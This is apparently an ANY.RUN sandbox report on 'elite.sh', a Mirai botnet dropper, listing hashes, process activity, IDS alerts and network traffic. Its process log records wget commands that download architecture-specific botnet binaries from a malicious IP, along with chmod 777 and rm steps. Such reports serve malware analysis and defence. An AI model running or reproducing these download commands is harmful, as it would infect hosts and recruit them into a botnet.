File name:

elite.sh

Full analysis: https://app.any.run/tasks/d5764d46-0404-4282-acf1-e22e82f5528e
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: December 13, 2024, 19:10:00
OS: Ubuntu 22.04.2 LTS
Tags:
mirai
botnet
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

7E6F39C9C0311FD5D4F1D16B640153D6

SHA1:

2D2CE1810D337C2673AFCA7343C393C42974A0C2

SHA256:

A712E812014D2D1D33897B8B0FCEE8A556CD66032F40C62A943BE5EBA4509A83

SSDEEP:

6:Sn0MbcaRaD1ASaRicaR30MbcDASlq2d0MbcY5AS3/V0MbcHGNI1ASeg30Mbcr6As:+a54Osrp5VNI1g66/PRDFgJ54a

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 38794)

  • SUSPICIOUS

    • Potential Corporate Privacy Violation

      • wget (PID: 38761)
      • wget (PID: 38782)
      • wget (PID: 38778)
      • wget (PID: 38773)
      • wget (PID: 38786)
      • wget (PID: 38798)
      • wget (PID: 38790)
      • wget (PID: 38794)
      • wget (PID: 38802)

    • Modifies file or directory owner

      • sudo (PID: 38754)

    • Executes the "rm" command to delete files or directories

      • dash (PID: 38765)
      • bash (PID: 38759)

    • Executes commands using command-line interpreter

      • sudo (PID: 38757)

    • Connects to the server without a host name

      • wget (PID: 38761)
      • wget (PID: 38778)
      • wget (PID: 38786)
      • wget (PID: 38790)
      • wget (PID: 38802)
      • wget (PID: 38782)
      • wget (PID: 38794)
      • wget (PID: 38798)

    • Uses wget to download content

      • bash (PID: 38759)

    • Connects to unusual port

      • busybox (PID: 38770)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
257
Monitored processes
45
Malicious processes
12
Suspicious processes
0

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget systemctl no specs chmod no specs elitebotnet.x86 no specs wget dash no specs busybox rm no specs mkdir no specs mv no specs chmod no specs busybox no specs busybox no specs systemctl no specs chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs #MIRAI wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
38753/bin/sh -c "sudo chown user /home/user/Desktop/elite\.sh && chmod +x /home/user/Desktop/elite\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/elite\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38754sudo chown user /home/user/Desktop/elite.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38755chown user /home/user/Desktop/elite.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38756chmod +x /home/user/Desktop/elite.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38757sudo -iu user /home/user/Desktop/elite.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38759-bash --login -c \/home\/user\/Desktop\/elite\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38760/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38761wget http://91.202.233.202/elitebotnet.x86/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38762systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38763chmod 777 Desktop Documents Downloads elitebotnet.x86 Music Pictures Public snap Templates test_files Videos/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
24
TCP/UDP connections
48
DNS requests
12
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
91.189.91.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
91.189.91.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
38761
wget
GET
200
91.202.233.202:80
http://91.202.233.202/elitebotnet.x86
unknown
malicious
38778
wget
GET
200
91.202.233.202:80
http://91.202.233.202/elitebotnet.arm5
unknown
malicious
38773
wget
GET
200
91.202.233.202:80
http://91.202.233.202/elitebotnet.arm
unknown
malicious
38790
wget
GET
200
91.202.233.202:80
http://91.202.233.202/elitebotnet.m68k
unknown
malicious
38794
wget
GET
200
91.202.233.202:80
http://91.202.233.202/elitebotnet.mips
unknown
malicious
38798
wget
GET
200
91.202.233.202:80
http://91.202.233.202/elitebotnet.mpsl
unknown
malicious
38802
wget
GET
200
91.202.233.202:80
http://91.202.233.202/elitebotnet.sh4
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.97:80
Canonical Group Limited
US
unknown
185.125.190.98:80
Canonical Group Limited
GB
unknown
484
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.96:80
Canonical Group Limited
US
unknown
37.19.194.80:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
195.181.170.19:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
38761
wget
91.202.233.202:80
M247 Ltd
TM
malicious

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 37.19.194.80
  • 195.181.170.19
  • 169.150.255.180
  • 207.211.211.26
  • 212.102.56.179
  • 169.150.255.184
  • 195.181.175.41
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
whitelisted
api.snapcraft.io
  • 185.125.188.55
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.54
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::6d
whitelisted
google.com
  • 142.250.184.206
  • 2a00:1450:4001:829::200e
whitelisted
147.100.168.192.in-addr.arpa
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::98
  • 2001:67c:1562::24
  • 2620:2d:4000:1::96
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
whitelisted

Threats

PID
Process
Class
Message
38761
wget
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
38761
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
38761
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38773
wget
Potentially Bad Traffic
ET INFO ARM File Download Request from IP Address
38773
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38778
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
38778
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38782
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
38782
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
38786
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
elite.sh